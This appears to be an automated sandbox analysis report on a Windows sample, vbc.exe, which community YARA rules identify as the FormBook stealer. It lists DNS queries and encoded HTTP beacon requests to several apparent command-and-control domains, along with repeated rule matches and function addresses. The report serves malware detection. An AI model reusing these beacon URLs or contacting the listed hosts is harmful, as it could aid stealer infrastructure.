Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 09 Nov 2021 11:58:13 GMTContent-Type: text/htmlContent-Length: 275ETag: "6185407c-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000B.00000000.291685186.0000000006870000.00000004.00000001.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J

Source: unknown

DNS traffic detected: queries for: www.sharpstead.com

Source: global traffic	HTTP traffic detected: GET /ht08/?iJB=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nkcbs5VIH8t4m4OlHQ==&IfNL=N8ph5BwH HTTP/1.1Host: www.sharpstead.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH HTTP/1.1Host: www.maikoufarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?iJB=YVcVQnADBOxtkizi8PwpXZC8MGRy3pUK9Tt3i8wwHZUtpCp/3ZP4J1retOso95pi3Qz1GtS4tg==&IfNL=N8ph5BwH HTTP/1.1Host: www.septemberstockevent200.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH HTTP/1.1Host: www.joye.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1Host: www.mmj0115.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1Host: www.mmj0115.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH HTTP/1.1Host: www.miabellavita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?iJB=h33IU5xP+CsHIX0jyOd12cEn3mj+DYpLQqBt2JgN37c56kNOSv5/h9LYm8RBo0LsRlylinxRVA==&IfNL=N8ph5BwH HTTP/1.1Host: www.yungbredda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH HTTP/1.1Host: www.mattlambert.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: vbc.exe, 00000000.00000002.263973483.0000000000D39000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: vbc.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\vbc.exe	Code function: 0_2_0295E970	0_2_0295E970
Source: C:\Users\user\Desktop\vbc.exe	Code function: 0_2_0295E96C	0_2_0295E96C
Source: C:\Users\user\Desktop\vbc.exe	Code function: 0_2_0295CF94	0_2_0295CF94
Source: C:\Users\user\Desktop\vbc.exe	Code function: 0_2_04FCDD66	0_2_04FCDD66
Source: C:\Users\user\Desktop\vbc.exe	Code function: 0_2_04FCD9C0	0_2_04FCD9C0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 0_2_04FCEDB0	0_2_04FCEDB0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 0_2_04FCEE51	0_2_04FCEE51
Source: C:\Users\user\Desktop\vbc.exe	Code function: 0_2_04FC4F49	0_2_04FC4F49
Source: C:\Users\user\Desktop\vbc.exe	Code function: 0_2_04FCF0C2	0_2_04FCF0C2
Source: C:\Users\user\Desktop\vbc.exe	Code function: 0_2_04FC9CA8	0_2_04FC9CA8
Source: C:\Users\user\Desktop\vbc.exe	Code function: 0_2_04FC9C98	0_2_04FC9C98
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_00401030	8_2_00401030
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0041C130	8_2_0041C130
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0041C9A5	8_2_0041C9A5
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0041BABE	8_2_0041BABE
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_00408C7B	8_2_00408C7B
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0041C4E6	8_2_0041C4E6
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_00408C80	8_2_00408C80
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_00402D87	8_2_00402D87
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_00402D90	8_2_00402D90
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_00402FB0	8_2_00402FB0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F0D20	8_2_017F0D20
